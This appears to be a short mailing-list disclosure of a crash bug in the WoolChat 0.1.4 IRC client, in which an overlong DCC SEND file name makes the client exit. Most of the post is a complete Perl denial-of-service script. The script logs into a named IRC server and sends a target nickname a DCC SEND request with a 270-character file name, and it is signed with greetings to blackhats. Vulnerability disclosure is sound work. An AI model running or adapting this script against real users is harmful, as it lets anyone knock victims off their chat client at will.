Hi,
I found a bug about WoolChat (japanese popular irc client)
http://www.vector.co.jp/soft/win95/net/se091872.html
which allow anyone to kill victim's WoolChat. It has a problem
to handle DCC SEND query so if 260 (or more) bytes file
name is specified, it exits immediately with error dialog.
DoS script (in perl) here:

#!/usr/bin/perl

# ---- doswchat.pl
# DoS against WoolChat 0.1.4
# greetz to: Japanese all blackhats =)
# 			written by White_E
# 			http://nogimmick.org/

use Socket;
my $vict=$ARGV[0] || die "usage: $0 <nick>\n";
my ($host,$port)=('irc.tokyo.wide.ad.jp','6664');    # modify
my ($user,$nick)=('USER USER USER USER','bnzyrgwp'); # modify
my $recv;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));
select(S);$|=1;select(STDOUT);$|=1;
my $paddr=pack_sockaddr_in($port,inet_aton($host));
connect(S,$paddr) || die "ERR: connect()\n";
print "[*] connected to server.\n";
print S "USER $user\r\nNICK $nick\r\n";
print "[*] USER and NICK sent.\n";
foreach (0..40) {
    $recv=<S>;
#    print $recv;
    last if ($recv =~ m/\s+376\s+/); # end of motd
}

my $file='A' x 270;
my $size='999';
my $msg="privmsg $vict :\x01DCC SEND $file 1234567890 2004 $size\x01\r\n";

print S $msg;
print "[*] attack done.\n";
print S "quit\r\n";
close(S);
exit;

Regards,

----
White_E <white_e@nogimmick.org>
http://nogimmick.org/